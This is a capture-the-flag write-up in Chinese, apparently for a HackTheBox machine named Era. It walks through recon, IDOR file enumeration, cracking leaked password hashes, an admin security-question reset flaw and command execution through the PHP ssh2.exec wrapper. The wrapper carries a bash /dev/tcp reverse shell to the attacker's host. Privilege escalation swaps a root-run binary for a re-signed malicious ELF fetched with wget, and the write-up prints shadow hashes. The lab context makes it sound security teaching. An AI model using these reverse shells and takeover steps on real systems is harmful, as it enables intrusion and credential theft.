基本信息

端口扫描

21和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
$ nmap -sC -sV -Pn 10.10.11.79
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-02 16:11 JST
Nmap scan report for 10.10.11.79
Host is up (0.18s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.5
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://era.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.99 seconds

80

需要加hosts:

1
10.10.11.79 era.htb

设计相关网站:

子域名扫描

常规子域名扫描发现file:

1
2
3
ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://era.htb/" -H 'Host: FUZZ.era.htb' -fs 154

file                    [Status: 200, Size: 6765, Words: 2608, Lines: 234, Duration: 188ms]

file

添加hosts后访问,是Era Storage:

Era Storage

页面上几个功能,存在密保问题登录和密码登录两种方式,扫描也可以找到注册界面:

1
2
3
4
5
6
7
8
9
10
11
12
gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://file.era.htb/ -x php --exclude-length 6765

/assets               (Status: 301) [Size: 178] [--> http://file.era.htb/assets/]
/download.php         (Status: 302) [Size: 0] [--> login.php]
/files                (Status: 301) [Size: 178] [--> http://file.era.htb/files/]
/images               (Status: 301) [Size: 178] [--> http://file.era.htb/images/]
/layout.php           (Status: 200) [Size: 0]
/login.php            (Status: 200) [Size: 9214]
/logout.php           (Status: 200) [Size: 70]
/manage.php           (Status: 302) [Size: 0] [--> login.php]
/register.php         (Status: 200) [Size: 3205]
/upload.php           (Status: 302) [Size: 0] [--> login.php]

随意注册登录,就是文件管理相关的:

download

测试上传下载,下载文件就是简单的数字id,尝试枚举idor:

枚举发现两个有效id,54和150

site-backup-30-08-24.zip

网站备份:

里面有个数据库文件,其中可以获取到几条hash:

1
2
3
4
5
6
7
8
9
10
sqlite3 filedb.sqlite

sqlite> .tables
sqlite> select * from users;
1|admin_ef01cab31aa|$2y$10$wDbohsUaezf74d3sMNRPi.o93wDxJqphM2m0VVUp41If6WrYr.QPC|600|Maria|Oliver|Ottawa
2|eric|$2y$10$S9EOSDqF1RzNUvyVj7OtJ.mskgP1spN3g2dneU.D.ABQLhSV2Qvxm|-1|||
3|veronica|$2y$10$xQmS7JL8UT4B3jAYK7jsNeZ4I.YqaFFnZNA/2GCxLveQ805kuQGOK|-1|||
4|yuri|$2b$12$HkRKUdjjOdf2WuTXovkHIOXwVDfSrgCqqHPpE37uWejRqUWqwEL2.|-1|||
5|john|$2a$10$iccCEz6.5.W2p7CSBOr3ReaOqyNmINMH1LaqeQaL22a1T1V/IddE6|-1|||
6|ethan|$2a$10$PkV/LAd07ftxVzBHhrpgcOwD3G1omX4Dk2Y56Tv9DpuUV/dh/a1wC|-1|||

其中yuri和eric的hash可以破解出密码:

1
2
eric america
yuri mustang

signing.zip

应该是签名证书文件:

FTP

Yuri可以登录ftp:

1
2
eric america
yuri mustang

主要就是一些配置文件,以及启用的扩展,可以看到启用了ssh2

code review

回到代码,可以在代码中找到一些漏洞:

reset

可以看到重置密保问题并没有验证当前用户是否是目标用户,所以我们可以重置admin密保问题后登录:

download

下载部分可以看到一个隐藏的immediate file download模式,允许admin使用wrapper下载文件,而前面看到启用了ssh2,ssh2有exec模式执行系统命令:

download to shell

所以就是先重置admin密保问题登录admin,然后download使用ssh2.exec来执行命令:

reset

首先重置密保问题后登录:

ssh2.exec

然后构造下载链接,使用ssh2.exec执行命令,得到yuri shell:

1
2
3
http://file.era.htb/download.php??id=54&show=true&format=ssh2.exec://yuri:mustang@127.0.0.1/bash -c "bash -i >& /dev/tcp/10.10.14.7/4444 0>&1";

http://file.era.htb/download.php?id=54&show=true&format=ssh2.exec://yuri:mustang@127.0.0.1/bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.7%2F4444%200%3E%261%22;

user flag

使用前面得到的密码切换到eric用户:

提权信息

常规枚举可以发现一个root运行的monitor,我们当前用户devs组对其有写权限:

所以就是替换程序,前面得到的签名证书也是这里用的

提权 & root flag

本地生成签名后的elf更方便:

1
2
3
4
5
6
7
8
9
10
11
12
13
x86_64-linux-gnu-gcc -o monitor exp.c -static

# linux-elf-binary-signer
make clean
gcc -o elf-sign elf_sign.c -lssl -lcrypto

# sign
./elf-sign sha256 key.pem key.pem monitor

wget http://10.10.14.7:7777/monitor
chmod +x monitor
rm /opt/AV/periodic-checks/monitor
cp monitor /opt/AV/periodic-checks/monitor

替换完成后等待命令执行即可:

shadow

1
2
3
root:$y$j9T$KS466bqZgScjpShqW.M5R.$ZJiDypD1.tHrT5D3AeWhnsIUp2rIrTnkRp4jrV5TjgB:19983:0:99999:7:::
eric:$6$.ki8iFVEyU3nItnU$hbR6van4JaXfZTkvXIynNfMIZMp4YCeU9f/jRR4xfdtCOceIJxwDHKrKyjMZtb2juxWsE6GcHJQAxfat7m12a/:19983:0:99999:7:::
yuri:$y$j9T$nb4GkUIQQFAvxZEOhZ0Dk0$WvwIZQLgnstRTdMheX1tug.aHi0TrwGcFJB93k8DcA6:20268:0:99999:7:::

参考资料